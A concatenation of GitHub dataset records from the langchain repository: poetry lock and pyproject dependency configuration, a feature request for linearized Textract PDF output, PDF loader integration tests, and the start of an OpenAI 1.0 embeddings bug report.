"sha256:48b6233b5c4cacb7afb0ee6b4f91820afbb6c0e3ae0fa10abbc20000acdf4f11"}, {file = "zstandard-0.21.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:e7d560ce14fd209db6adacce8908244503a009c6c39eee0c10f138996cd66d3e"}, {file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1e6e131a4df2eb6f64961cea6f979cdff22d6e0d5516feb0d09492c8fd36f3bc"}, {file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e1e0c62a67ff425927898cf43da2cf6b852289ebcc2054514ea9bf121bec10a5"}, {file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:1545fb9cb93e043351d0cb2ee73fa0ab32e61298968667bb924aac166278c3fc"}, {file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fe6c821eb6870f81d73bf10e5deed80edcac1e63fbc40610e61f340723fd5f7c"}, {file = "zstandard-0.21.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = 
"sha256:ddb086ea3b915e50f6604be93f4f64f168d3fc3cef3585bb9a375d5834392d4f"}, {file = "zstandard-0.21.0-cp37-cp37m-win32.whl", hash = "sha256:57ac078ad7333c9db7a74804684099c4c77f98971c151cee18d17a12649bc25c"}, {file = "zstandard-0.21.0-cp37-cp37m-win_amd64.whl", hash = "sha256:1243b01fb7926a5a0417120c57d4c28b25a0200284af0525fddba812d575f605"}, {file = "zstandard-0.21.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ea68b1ba4f9678ac3d3e370d96442a6332d431e5050223626bdce748692226ea"}, {file = "zstandard-0.21.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:8070c1cdb4587a8aa038638acda3bd97c43c59e1e31705f2766d5576b329e97c"}, {file = "zstandard-0.21.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4af612c96599b17e4930fe58bffd6514e6c25509d120f4eae6031b7595912f85"}, {file = "zstandard-0.21.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cff891e37b167bc477f35562cda1248acc115dbafbea4f3af54ec70821090965"}, {file = "zstandard-0.21.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:a9fec02ce2b38e8b2e86079ff0b912445495e8ab0b137f9c0505f88ad0d61296"}, {file = "zstandard-0.21.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0bdbe350691dec3078b187b8304e6a9c4d9db3eb2d50ab5b1d748533e746d099"}, {file = "zstandard-0.21.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:b69cccd06a4a0a1d9fb3ec9a97600055cf03030ed7048d4bcb88c574f7895773"}, {file = "zstandard-0.21.0-cp38-cp38-win32.whl", hash = "sha256:9980489f066a391c5572bc7dc471e903fb134e0b0001ea9b1d3eff85af0a6f1b"}, {file = "zstandard-0.21.0-cp38-cp38-win_amd64.whl", hash = "sha256:0e1e94a9d9e35dc04bf90055e914077c80b1e0c15454cc5419e82529d3e70728"}, {file = "zstandard-0.21.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d2d61675b2a73edcef5e327e38eb62bdfc89009960f0e3991eae5cc3d54718de"}, {file = "zstandard-0.21.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:25fbfef672ad798afab12e8fd204d122fca3bc8e2dcb0a2ba73bf0a0ac0f5f07"}, {file = "zstandard-0.21.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:62957069a7c2626ae80023998757e27bd28d933b165c487ab6f83ad3337f773d"}, {file = "zstandard-0.21.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:14e10ed461e4807471075d4b7a2af51f5234c8f1e2a0c1d37d5ca49aaaad49e8"}, {file = "zstandard-0.21.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:9cff89a036c639a6a9299bf19e16bfb9ac7def9a7634c52c257166db09d950e7"}, {file = "zstandard-0.21.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:52b2b5e3e7670bd25835e0e0730a236f2b0df87672d99d3bf4bf87248aa659fb"}, {file = "zstandard-0.21.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:b1367da0dde8ae5040ef0413fb57b5baeac39d8931c70536d5f013b11d3fc3a5"}, {file = "zstandard-0.21.0-cp39-cp39-win32.whl", hash = "sha256:db62cbe7a965e68ad2217a056107cc43d41764c66c895be05cf9c8b19578ce9c"}, {file = "zstandard-0.21.0-cp39-cp39-win_amd64.whl", hash = "sha256:a8d200617d5c876221304b0e3fe43307adde291b4a897e7b0617a61611dfff6a"}, {file = "zstandard-0.21.0.tar.gz", hash = "sha256:f08e3a10d01a247877e4cb61a82a319ea746c356a3786558bed2481e6c405546"}, ] [package.dependencies] cffi = {version = ">=1.11", markers = "platform_python_implementation == 
\"PyPy\""} [package.extras] cffi = ["cffi (>=1.11)"] [extras] all = ["O365", "aleph-alpha-client", "amadeus", "arxiv", "atlassian-python-api", "awadb", "azure-ai-formrecognizer", "azure-ai-vision", "azure-cognitiveservices-speech", "azure-cosmos", "azure-identity", "beautifulsoup4", "clarifai", "clickhouse-connect", "cohere", "deeplake", "docarray", "duckduckgo-search", "elasticsearch", "esprima", "faiss-cpu", "google-api-python-client", "google-auth", "google-search-results", "gptcache", "html2text", "huggingface_hub", "jinja2", "jq", "lancedb", "langkit", "lark", "librosa", "lxml", "manifest-ml", "marqo", "momento", "nebula3-python", "neo4j", "networkx", "nlpcloud", "nltk", "nomic", "openai", "openlm", "opensearch-py", "pdfminer-six", "pexpect", "pgvector", "pinecone-client", "pinecone-text", "psycopg2-binary", "pymongo", "pyowm", "pypdf", "pytesseract", "python-arango", "pyvespa", "qdrant-client", "rdflib", "redis", "requests-toolbelt", "sentence-transformers", "singlestoredb", "tensorflow-text", "tigrisdb", "tiktoken", "torch", "transformers", "weaviate-client", "wikipedia", "wolframalpha"] azure = ["azure-ai-formrecognizer", "azure-ai-vision", "azure-cognitiveservices-speech", "azure-core", "azure-cosmos", "azure-identity", "azure-search-documents", "openai"] clarifai = ["clarifai"] cli = ["typer"] cohere = ["cohere"] docarray = ["docarray"] embeddings = ["sentence-transformers"] extended-testing = ["aiosqlite", "aleph-alpha-client", "amazon-textract-caller", "anthropic", "arxiv", "assemblyai", "atlassian-python-api", "beautifulsoup4", "bibtexparser", "cassio", "chardet", "dashvector", "esprima", "faiss-cpu", "feedparser", "geopandas", "gitpython", "google-cloud-documentai", "gql", "html2text", "jinja2", "jq", "jsonschema", "lxml", "markdownify", "motor", "mwparserfromhell", "mwxml", "newspaper3k", "numexpr", "openai", "openai", "openapi-pydantic", "pandas", "pdfminer-six", "pgvector", "psychicapi", "py-trello", "pymupdf", "pypdf", "pypdfium2", "pyspark", "rank-bm25", "rapidfuzz", "rapidocr-onnxruntime", "requests-toolbelt", "rspace_client", "scikit-learn", "sqlite-vss", "streamlit", "sympy", "telethon", "timescale-vector", "tqdm", "upstash-redis", "xata", "xmltodict"] javascript = ["esprima"] llms = ["clarifai", "cohere", "huggingface_hub", "manifest-ml", "nlpcloud", "openai", "openlm", "torch", "transformers"] openai = ["openai", "tiktoken"] qdrant = ["qdrant-client"] text-helpers = ["chardet"] [metadata] lock-version = "2.0" python-versions = ">=3.8.1,<4.0" content-hash = "9345cd37346e9f369702f51b7e10dde8da91d5f7b659c8c204e5b46c360cd028"
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,068
feat: Add Linearized output to Textract PDFLoader
### Feature request Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies layout elements such as tables, lists, figures, text paragraphs, and titles. The AmazonTextractPDFParser should use these hints to generate linearized output that improves downstream LLM accuracy. When features such as LAYOUT, TABLES, and FORMS are passed to the Textract call, the text output should render tables and key/value pairs, emit text in reading order for multi-column pages, and prefix list items with a *. ### Motivation Improve downstream LLM accuracy. ### Your contribution I'll submit a PR for this feature.
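A rough sketch of how the requested behavior could be driven from the loader's existing `textract_features` parameter (the parameter is already visible in the integration tests further down; the `"LAYOUT"` feature value and the S3 path are assumptions, since LAYOUT support only lands with the linked PR):

```python
from langchain.document_loaders import AmazonTextractPDFLoader

# Hypothetical input; any local PDF or S3 URI the loader accepts works here.
file_path = "s3://my-bucket/multi-column-report.pdf"

# Ask Textract for the layout-aware analyses so the parser has the hints
# it needs to linearize tables, key/value pairs, and reading order.
loader = AmazonTextractPDFLoader(
    file_path,
    textract_features=["LAYOUT", "TABLES", "FORMS"],
)

docs = loader.load()  # one Document per page
print(docs[0].page_content)  # linearized text, list items prefixed with "*"
```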
https://github.com/langchain-ai/langchain/issues/12068
https://github.com/langchain-ai/langchain/pull/12446
a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445
0c7f1d8b219e87e3ffd14a15a452622c532c7e95
"2023-10-20T08:28:07Z"
python
"2023-10-31T01:02:10Z"
libs/langchain/pyproject.toml
[tool.poetry] name = "langchain" version = "0.0.326" description = "Building applications with LLMs through composability" authors = [] license = "MIT" readme = "README.md" repository = "https://github.com/langchain-ai/langchain" [tool.poetry.scripts] langchain-server = "langchain.server:main" [tool.poetry.dependencies] python = ">=3.8.1,<4.0" pydantic = ">=1,<3" SQLAlchemy = ">=1.4,<3" requests = "^2" PyYAML = ">=5.3" numpy = "^1" azure-core = {version = "^1.26.4", optional=true} tqdm = {version = ">=4.48.0", optional = true} openapi-pydantic = {version = "^0.3.2", optional = true} faiss-cpu = {version = "^1", optional = true} wikipedia = {version = "^1", optional = true} elasticsearch = {version = "^8", optional = true} opensearch-py = {version = "^2.0.0", optional = true} redis = {version = "^4", optional = true} manifest-ml = {version = "^0.0.1", optional = true} nltk = {version = "^3", optional = true} transformers = {version = "^4", optional = true} beautifulsoup4 = {version = "^4", optional = true} torch = {version = ">=1,<3", optional = true} jinja2 = {version = "^3", optional = true} tiktoken = {version = ">=0.3.2,<0.6.0", optional = true, python=">=3.9"} pinecone-client = {version = "^2", optional = true} pinecone-text = {version = "^0.4.2", optional = true} pymongo = {version = "^4.3.3", optional = true} clickhouse-connect = {version="^0.5.14", optional=true} weaviate-client = {version = "^3", optional = true} marqo = {version = "^1.2.4", optional=true} google-api-python-client = {version = "2.70.0", optional = true} google-auth = {version = "^2.18.1", optional = true} wolframalpha = {version = "5.0.0", optional = true} qdrant-client = {version = "^1.3.1", optional = true, python = ">=3.8.1,<3.12"} dataclasses-json = ">= 0.5.7, < 0.7" tensorflow-text = {version = "^2.11.0", optional = true, python = "^3.10, <3.12"} tenacity = "^8.1.0" cohere = {version = "^4", optional = true} openai = {version = "^0", optional = true} nlpcloud = {version = "^1", optional = true} nomic = {version = "^1.0.43", optional = true} huggingface_hub = {version = "^0", optional = true} google-search-results = {version = "^2", optional = true} sentence-transformers = {version = "^2", optional = true} aiohttp = "^3.8.3" arxiv = {version = "^1.4", optional = true} pypdf = {version = "^3.4.0", optional = true} networkx = {version=">=2.6.3, <4", optional = true} aleph-alpha-client = {version="^2.15.0", optional = true} deeplake = {version = "^3.8.3", optional = true} pgvector = {version = "^0.1.6", optional = true} psycopg2-binary = {version = "^2.9.5", optional = true} pyowm = {version = "^3.3.0", optional = true} async-timeout = {version = "^4.0.0", python = "<3.11"} azure-identity = {version = "^1.12.0", optional=true} gptcache = {version = ">=0.1.7", optional = true} atlassian-python-api = {version = "^3.36.0", optional=true} pytesseract = {version = "^0.3.10", optional=true} html2text = {version="^2020.1.16", optional=true} numexpr = {version="^2.8.6", optional=true} duckduckgo-search = {version="^3.8.3", optional=true} azure-cosmos = {version="^4.4.0b1", optional=true} lark = {version="^1.1.5", optional=true} lancedb = {version = "^0.1", optional = true} pexpect = {version = "^4.8.0", optional = true} pyvespa = {version = "^0.33.0", optional = true} O365 = {version = "^2.0.26", optional = true} jq = {version = "^1.4.1", optional = true} pdfminer-six = {version = "^20221105", optional = true} docarray = {version="^0.32.0", extras=["hnswlib"], optional=true} lxml = {version = "^4.9.2", optional = true} 
pymupdf = {version = "^1.22.3", optional = true} rapidocr-onnxruntime = {version = "^1.3.2", optional = true, python = ">=3.8.1,<3.12"} pypdfium2 = {version = "^4.10.0", optional = true} gql = {version = "^3.4.1", optional = true} pandas = {version = "^2.0.1", optional = true} telethon = {version = "^1.28.5", optional = true} neo4j = {version = "^5.8.1", optional = true} langkit = {version = ">=0.0.6, <0.1.0", optional = true} chardet = {version="^5.1.0", optional=true} requests-toolbelt = {version = "^1.0.0", optional = true} openlm = {version = "^0.0.5", optional = true} scikit-learn = {version = "^1.2.2", optional = true} azure-ai-formrecognizer = {version = "^3.2.1", optional = true} azure-ai-vision = {version = "^0.11.1b1", optional = true} azure-cognitiveservices-speech = {version = "^1.28.0", optional = true} py-trello = {version = "^0.19.0", optional = true} momento = {version = "^1.10.1", optional = true} bibtexparser = {version = "^1.4.0", optional = true} singlestoredb = {version = "^0.7.1", optional = true} pyspark = {version = "^3.4.0", optional = true} clarifai = {version = ">=9.1.0", optional = true} tigrisdb = {version = "^1.0.0b6", optional = true} nebula3-python = {version = "^3.4.0", optional = true} mwparserfromhell = {version = "^0.6.4", optional = true} mwxml = {version = "^0.3.3", optional = true} awadb = {version = "^0.3.9", optional = true} azure-search-documents = {version = "11.4.0b8", optional = true} esprima = {version = "^4.0.1", optional = true} streamlit = {version = "^1.18.0", optional = true, python = ">=3.8.1,<3.9.7 || >3.9.7,<4.0"} psychicapi = {version = "^0.8.0", optional = true} cassio = {version = "^0.1.0", optional = true} rdflib = {version = "^6.3.2", optional = true} sympy = {version = "^1.12", optional = true} rapidfuzz = {version = "^3.1.1", optional = true} jsonschema = {version = ">1", optional = true} langsmith = "~0.0.52" rank-bm25 = {version = "^0.2.2", optional = true} amadeus = {version = ">=8.1.0", optional = true} geopandas = {version = "^0.13.1", optional = true} python-arango = {version = "^7.5.9", optional = true} gitpython = {version = "^3.1.32", optional = true} librosa = {version="^0.10.0.post2", optional = true } feedparser = {version = "^6.0.10", optional = true} newspaper3k = {version = "^0.2.8", optional = true} amazon-textract-caller = {version = "<2", optional = true} xata = {version = "^1.0.0a7", optional = true} xmltodict = {version = "^0.13.0", optional = true} markdownify = {version = "^0.11.6", optional = true} assemblyai = {version = "^0.17.0", optional = true} dashvector = {version = "^1.0.1", optional = true} sqlite-vss = {version = "^0.1.2", optional = true} motor = {version = "^3.3.1", optional = true} anyio = "<4.0" jsonpatch = "^1.33" timescale-vector = {version = "^0.0.1", optional = true} typer = {version= "^0.9.0", optional = true} anthropic = {version = "^0.3.11", optional = true} aiosqlite = {version = "^0.19.0", optional = true} rspace_client = {version = "^2.5.0", optional = true} upstash-redis = {version = "^0.15.0", optional = true} google-cloud-documentai = {version = "^2.20.1", optional = true} [tool.poetry.group.test.dependencies] # The only dependencies that should be added are # dependencies used for running tests (e.g., pytest, freezegun, response). # Any dependencies that do not meet that criteria will be removed. 
pytest = "^7.3.0" pytest-cov = "^4.0.0" pytest-dotenv = "^0.5.2" duckdb-engine = "^0.9.2" pytest-watcher = "^0.2.6" freezegun = "^1.2.2" responses = "^0.22.0" pytest-asyncio = "^0.20.3" lark = "^1.1.5" pandas = "^2.0.0" pytest-mock = "^3.10.0" pytest-socket = "^0.6.0" syrupy = "^4.0.2" requests-mock = "^1.11.0" [tool.poetry.group.codespell.dependencies] codespell = "^2.2.0" [tool.poetry.group.test_integration] optional = true [tool.poetry.group.test_integration.dependencies] # Do not add dependencies in the test_integration group # Instead: # 1. Add an optional dependency to the main group # poetry add --optional [package name] # 2. Add the package name to the extended_testing extra (find it below) # 3. Relock the poetry file # poetry lock --no-update # 4. Favor unit tests not integration tests. # Use the @pytest.mark.requires(pkg_name) decorator in unit_tests. # Your tests should not rely on network access, as it prevents other # developers from being able to easily run them. # Instead write unit tests that use the `responses` library or mock.patch with # fixtures. Keep the fixtures minimal. # See CONTRIBUTING.md for more instructions on working with optional dependencies. # https://github.com/langchain-ai/langchain/blob/master/.github/CONTRIBUTING.md#working-with-optional-dependencies pytest-vcr = "^1.0.2" wrapt = "^1.15.0" openai = "^0.27.4" python-dotenv = "^1.0.0" cassio = "^0.1.0" tiktoken = "^0.3.2" anthropic = "^0.3.11" [tool.poetry.group.lint.dependencies] ruff = "^0.1" types-toml = "^0.10.8.1" types-redis = "^4.3.21.6" types-pytz = "^2023.3.0.0" black = "^23.10.0" types-chardet = "^5.0.4.6" mypy-protobuf = "^3.0.0" [tool.poetry.group.typing.dependencies] mypy = "^0.991" types-pyyaml = "^6.0.12.2" types-requests = "^2.28.11.5" [tool.poetry.group.dev] optional = true [tool.poetry.group.dev.dependencies] jupyter = "^1.0.0" playwright = "^1.28.0" setuptools = "^67.6.1" [tool.poetry.extras] llms = ["clarifai", "cohere", "openai", "openlm", "nlpcloud", "huggingface_hub", "manifest-ml", "torch", "transformers"] qdrant = ["qdrant-client"] openai = ["openai", "tiktoken"] text_helpers = ["chardet"] clarifai = ["clarifai"] cohere = ["cohere"] docarray = ["docarray"] embeddings = ["sentence-transformers"] javascript = ["esprima"] azure = [ "azure-identity", "azure-cosmos", "openai", "azure-core", "azure-ai-formrecognizer", "azure-ai-vision", "azure-cognitiveservices-speech", "azure-search-documents", ] all = [ "clarifai", "cohere", "openai", "nlpcloud", "huggingface_hub", "manifest-ml", "elasticsearch", "opensearch-py", "google-search-results", "faiss-cpu", "sentence-transformers", "transformers", "nltk", "wikipedia", "beautifulsoup4", "tiktoken", "torch", "jinja2", "pinecone-client", "pinecone-text", "marqo", "pymongo", "weaviate-client", "redis", "google-api-python-client", "google-auth", "wolframalpha", "qdrant-client", "tensorflow-text", "pypdf", "networkx", "nomic", "aleph-alpha-client", "deeplake", "pgvector", "psycopg2-binary", "pyowm", "pytesseract", "html2text", "atlassian-python-api", "gptcache", "duckduckgo-search", "arxiv", "azure-identity", "clickhouse-connect", "azure-cosmos", "lancedb", "langkit", "lark", "pexpect", "pyvespa", "O365", "jq", "docarray", "pdfminer-six", "lxml", "requests-toolbelt", "neo4j", "openlm", "azure-ai-formrecognizer", "azure-ai-vision", "azure-cognitiveservices-speech", "momento", "singlestoredb", "tigrisdb", "nebula3-python", "awadb", "esprima", "rdflib", "amadeus", "librosa", "python-arango", ] cli = [ "typer" ] # An extra used to be able to add 
extended testing. # Please use new-line on formatting to make it easier to add new packages without # merge-conflicts extended_testing = [ "aleph-alpha-client", "amazon-textract-caller", "aiosqlite", "assemblyai", "beautifulsoup4", "bibtexparser", "cassio", "chardet", "google-cloud-documentai", "esprima", "jq", "pdfminer-six", "pgvector", "pypdf", "pymupdf", "pypdfium2", "tqdm", "lxml", "atlassian-python-api", "mwparserfromhell", "mwxml", "pandas", "telethon", "psychicapi", "gql", "requests-toolbelt", "html2text", "numexpr", "py-trello", "scikit-learn", "streamlit", "pyspark", "openai", "sympy", "rapidfuzz", "jsonschema", "openai", "rank-bm25", "geopandas", "jinja2", "gitpython", "newspaper3k", "feedparser", "xata", "xmltodict", "faiss-cpu", "openapi-pydantic", "markdownify", "arxiv", "dashvector", "sqlite-vss", "rapidocr-onnxruntime", "motor", "timescale-vector", "anthropic", "upstash-redis", "rspace_client", ] [tool.ruff] select = [ "E", # pycodestyle "F", # pyflakes "I", # isort ] exclude = [ "tests/integration_tests/examples/non-utf8-encoding.py", ] [tool.mypy] ignore_missing_imports = "True" disallow_untyped_defs = "True" exclude = ["notebooks", "examples", "example_data"] [tool.coverage.run] omit = [ "tests/*", ] [build-system] requires = ["poetry-core>=1.0.0"] build-backend = "poetry.core.masonry.api" [tool.pytest.ini_options] # --strict-markers will raise errors on unknown marks. # https://docs.pytest.org/en/7.1.x/how-to/mark.html#raising-errors-on-unknown-marks # # https://docs.pytest.org/en/7.1.x/reference/reference.html # --strict-config any warnings encountered while parsing the `pytest` # section of the configuration file raise errors. # # https://github.com/tophat/syrupy # --snapshot-warn-unused Prints a warning on unused snapshots rather than fail the test suite. addopts = "--strict-markers --strict-config --durations=5 --snapshot-warn-unused -vv" # Registering custom markers. # https://docs.pytest.org/en/7.1.x/example/markers.html#registering-markers markers = [ "requires: mark tests as requiring a specific library", "scheduled: mark tests to run in scheduled testing", "compile: mark placeholder test used to compile integration tests without running them" ] [tool.codespell] skip = '.git,*.pdf,*.svg,*.pdf,*.yaml,*.ipynb,poetry.lock,*.min.js,*.css,package-lock.json,example_data,_dist,examples' # Ignore latin etc ignore-regex = '.*(Stati Uniti|Tense=Pres).*' # whats is a typo but used frequently in queries so kept as is # aapply - async apply # unsecure - typo but part of API, decided to not bother for now ignore-words-list = 'momento,collison,ned,foor,reworkd,parth,whats,aapply,mysogyny,unsecure,damon,crate,aadd,symbl,precesses,accademia,nin'
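The `[tool.poetry.extras]` tables above exist because LangChain keeps heavy packages out of the core install; call sites then guard their imports at runtime. A sketch of that pattern (the same shape used throughout the codebase), using `tiktoken` from the `openai` extra as the example:

```python
def _require_tiktoken():
    """Import an optional dependency, failing with an actionable message."""
    try:
        import tiktoken
    except ImportError:
        raise ImportError(
            "Could not import tiktoken python package. "
            "Please install it with `pip install tiktoken`."
        )
    return tiktoken
```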
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,068
feat: Add Linearized output to Textract PDFLoader
### Feature request Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies layout elements such as tables, lists, figures, text paragraphs, and titles. The AmazonTextractPDFParser should use these hints to generate linearized output that improves downstream LLM accuracy. When features such as LAYOUT, TABLES, and FORMS are passed to the Textract call, the text output should render tables and key/value pairs, emit text in reading order for multi-column pages, and prefix list items with a *. ### Motivation Improve downstream LLM accuracy. ### Your contribution I'll submit a PR for this feature.
https://github.com/langchain-ai/langchain/issues/12068
https://github.com/langchain-ai/langchain/pull/12446
a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445
0c7f1d8b219e87e3ffd14a15a452622c532c7e95
"2023-10-20T08:28:07Z"
python
"2023-10-31T01:02:10Z"
libs/langchain/tests/integration_tests/document_loaders/test_pdf.py
from pathlib import Path
from typing import Sequence, Union

import pytest

from langchain.document_loaders import (
    AmazonTextractPDFLoader,
    MathpixPDFLoader,
    PDFMinerLoader,
    PDFMinerPDFasHTMLLoader,
    PyMuPDFLoader,
    PyPDFium2Loader,
    PyPDFLoader,
    UnstructuredPDFLoader,
)


def test_unstructured_pdf_loader_elements_mode() -> None:
    """Test unstructured loader with various modes."""
    file_path = Path(__file__).parent.parent / "examples/hello.pdf"
    loader = UnstructuredPDFLoader(str(file_path), mode="elements")
    docs = loader.load()
    assert len(docs) == 2


def test_unstructured_pdf_loader_paged_mode() -> None:
    """Test unstructured loader with various modes."""
    file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
    loader = UnstructuredPDFLoader(str(file_path), mode="paged")
    docs = loader.load()
    assert len(docs) == 16


def test_unstructured_pdf_loader_default_mode() -> None:
    """Test unstructured loader."""
    file_path = Path(__file__).parent.parent / "examples/hello.pdf"
    loader = UnstructuredPDFLoader(str(file_path))
    docs = loader.load()
    assert len(docs) == 1


def test_pdfminer_loader() -> None:
    """Test PDFMiner loader."""
    file_path = Path(__file__).parent.parent / "examples/hello.pdf"
    loader = PDFMinerLoader(str(file_path))
    docs = loader.load()
    assert len(docs) == 1

    file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
    loader = PDFMinerLoader(str(file_path))
    docs = loader.load()
    assert len(docs) == 1


def test_pdfminer_pdf_as_html_loader() -> None:
    """Test PDFMinerPDFasHTMLLoader."""
    file_path = Path(__file__).parent.parent / "examples/hello.pdf"
    loader = PDFMinerPDFasHTMLLoader(str(file_path))
    docs = loader.load()
    assert len(docs) == 1

    file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
    loader = PDFMinerPDFasHTMLLoader(str(file_path))
    docs = loader.load()
    assert len(docs) == 1


def test_pypdf_loader() -> None:
    """Test PyPDFLoader."""
    file_path = Path(__file__).parent.parent / "examples/hello.pdf"
    loader = PyPDFLoader(str(file_path))
    docs = loader.load()
    assert len(docs) == 1

    file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
    loader = PyPDFLoader(str(file_path))
    docs = loader.load()
    assert len(docs) == 16


def test_pypdfium2_loader() -> None:
    """Test PyPDFium2Loader."""
    file_path = Path(__file__).parent.parent / "examples/hello.pdf"
    loader = PyPDFium2Loader(str(file_path))
    docs = loader.load()
    assert len(docs) == 1

    file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
    loader = PyPDFium2Loader(str(file_path))
    docs = loader.load()
    assert len(docs) == 16


def test_pymupdf_loader() -> None:
    """Test PyMuPDF loader."""
    file_path = Path(__file__).parent.parent / "examples/hello.pdf"
    loader = PyMuPDFLoader(str(file_path))
    docs = loader.load()
    assert len(docs) == 1

    file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
    loader = PyMuPDFLoader(str(file_path))
    docs = loader.load()
    assert len(docs) == 16
    assert loader.web_path is None

    web_path = "https://people.sc.fsu.edu/~jpeterson/hello_world.pdf"
    loader = PyMuPDFLoader(web_path)
    docs = loader.load()
    assert loader.web_path == web_path
    assert loader.file_path != web_path
    assert len(docs) == 1


def test_mathpix_loader() -> None:
    file_path = Path(__file__).parent.parent / "examples/hello.pdf"
    loader = MathpixPDFLoader(str(file_path))
    docs = loader.load()
    assert len(docs) == 1
    print(docs[0].page_content)

    file_path = Path(__file__).parent.parent / "examples/layout-parser-paper.pdf"
    loader = MathpixPDFLoader(str(file_path))
    docs = loader.load()
    assert len(docs) == 1
    print(docs[0].page_content)


@pytest.mark.parametrize(
    "file_path, features, docs_length, create_client",
    [
        (
            (
                "https://amazon-textract-public-content.s3.us-east-2.amazonaws.com"
                "/langchain/alejandro_rosalez_sample_1.jpg"
            ),
            ["FORMS", "TABLES"],
            1,
            False,
        ),
        (str(Path(__file__).parent.parent / "examples/hello.pdf"), ["FORMS"], 1, False),
        (
            "s3://amazon-textract-public-content/langchain/layout-parser-paper.pdf",
            None,
            16,
            True,
        ),
    ],
)
@pytest.mark.skip(reason="Requires AWS credentials to run")
def test_amazontextract_loader(
    file_path: str,
    features: Union[Sequence[str], None],
    docs_length: int,
    create_client: bool,
) -> None:
    if create_client:
        import boto3

        textract_client = boto3.client("textract", region_name="us-east-2")
        loader = AmazonTextractPDFLoader(
            file_path, textract_features=features, client=textract_client
        )
    else:
        loader = AmazonTextractPDFLoader(file_path, textract_features=features)
    docs = loader.load()

    assert len(docs) == docs_length


@pytest.mark.skip(reason="Requires AWS credentials to run")
def test_amazontextract_loader_failures() -> None:
    # 2-page PDF local file system
    two_page_pdf = str(
        Path(__file__).parent.parent / "examples/multi-page-forms-sample-2-page.pdf"
    )
    loader = AmazonTextractPDFLoader(two_page_pdf)
    with pytest.raises(ValueError):
        loader.load()
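The loaders under test all return `Document` objects, so downstream use has the same shape regardless of backend; a minimal sketch (the path and chunk sizes are illustrative):

```python
from langchain.document_loaders import PyPDFLoader
from langchain.text_splitter import RecursiveCharacterTextSplitter

loader = PyPDFLoader("examples/layout-parser-paper.pdf")  # path assumed
docs = loader.load()  # one Document per page (16 for this paper)

# Chunk pages before embedding; sizes here are placeholders.
splitter = RecursiveCharacterTextSplitter(chunk_size=1000, chunk_overlap=100)
chunks = splitter.split_documents(docs)
print(len(chunks), chunks[0].metadata)  # metadata carries source and page
```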
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,943
OpenAIEmbeddings() does not work because of these bugs
### System Info Python Version: 3.11 LangChain Version: 0.0.331 OpenAI Version: 1.0.0 ### Who can help? @hwchase17, @agola11, @eyurtsev ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction The following error is caused by the recent upgrade of the OpenAI package to 1.0.0. **Use openai==0.28.1 to work around it.** With the code `embeddings = OpenAIEmbeddings()`, the error produced is: `AttributeError: module 'openai' has no attribute 'Embedding'. Did you mean: 'embeddings'?` I went through the `langchain/embeddings/openai.py` file and changed `value["client"] = openai.Embedding` to `value["client"] = openai.embeddings`, but then I received this new error: `AttributeError: module 'openai' has no attribute 'error'` in the same file (`langchain/embeddings/openai.py`). ### Expected behavior The call should succeed without an error.
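The report's workaround is to pin the pre-1.0 SDK. As a sketch (not part of LangChain), a small guard makes the version mismatch fail fast with an actionable message instead of the opaque `AttributeError`:

```python
from importlib.metadata import version

from packaging.version import Version

# LangChain 0.0.331's embeddings client expects the pre-1.0 OpenAI SDK
# (openai.Embedding, openai.error), so refuse to continue on openai>=1.0.
if Version(version("openai")) >= Version("1.0.0"):
    raise RuntimeError(
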